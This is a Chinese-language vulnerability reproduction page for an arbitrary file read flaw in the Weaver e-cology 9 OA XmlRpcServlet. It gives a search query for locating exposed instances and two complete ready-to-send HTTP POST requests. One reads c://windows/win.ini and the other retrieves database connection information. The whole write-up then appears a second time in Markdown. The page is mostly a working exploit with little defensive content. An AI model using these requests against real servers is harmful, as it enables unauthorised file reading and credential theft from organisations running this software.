fofamini-wiki

登录白背景

源码

泛微e-cology 9 XmlRpcServlet存在任意文件读取漏洞

一、漏洞简介

泛微e-cology是一款由泛微网络科技开发的协同管理平台，支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology XmlRpcServlet存在任意文件读取漏洞，攻击者可通过该漏洞获取敏感信息

二、影响版本

泛微e-cology9

三、资产测绘

hunterapp.name=="泛微 e-cology 9.0 OA"
特征

四、漏洞复现

任意文件读取

POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/xml
Accept-Encoding: gzip
Content-Length: 201
 
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>WorkflowService.getAttachment</methodName>
<params>
<param>
<value><string>c://windows/win.ini</string></value>
</param>
</params>
</methodCall>

信息泄露
获取数据库连接信息

POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/xml
Accept-Encoding: gzip
Content-Length: 201
 
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>WorkflowService.LoadTemplateProp</methodName>
<params>
<param>
<value><string>weaver</string></value>
</param>
</params>
</methodCall>

原文: https://www.yuque.com/xiaokp7/ocvun2/re2uxh2qa7zqog3f

# 泛微e-cology 9 XmlRpcServlet存在任意文件读取漏洞

# 一、漏洞简介
泛微e-cology是一款由泛微网络科技开发的协同管理平台，支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology XmlRpcServlet存在任意文件读取漏洞，攻击者可通过该漏洞获取敏感信息

# 二、影响版本

- 泛微e-cology9

# 三、资产测绘

- hunter`app.name=="泛微 e-cology 9.0 OA"`
- 特征
![image.png](./img/rWPvInDSkg0iaMBU/1702436738823-440fba62-fae2-43a6-a483-79cb79b98856-956788.png)

# 四、漏洞复现
任意文件读取
```
POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/xml
Accept-Encoding: gzip
Content-Length: 201
 
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>WorkflowService.getAttachment</methodName>
<params>
<param>
<value><string>c://windows/win.ini</string></value>
</param>
</params>
</methodCall>
```
![image.png](./img/rWPvInDSkg0iaMBU/1702436777200-aa6f709b-b97b-4d5b-9ce5-2b9a9c30f2aa-830865.png)
信息泄露
获取数据库连接信息
```
POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/xml
Accept-Encoding: gzip
Content-Length: 201
 
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>WorkflowService.LoadTemplateProp</methodName>
<params>
<param>
<value><string>weaver</string></value>
</param>
</params>
</methodCall>
```
![image.png](./img/rWPvInDSkg0iaMBU/1702436965516-ff31e98a-5e8c-47c7-b34c-c9ed4bdb6ed7-511236.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/re2uxh2qa7zqog3f>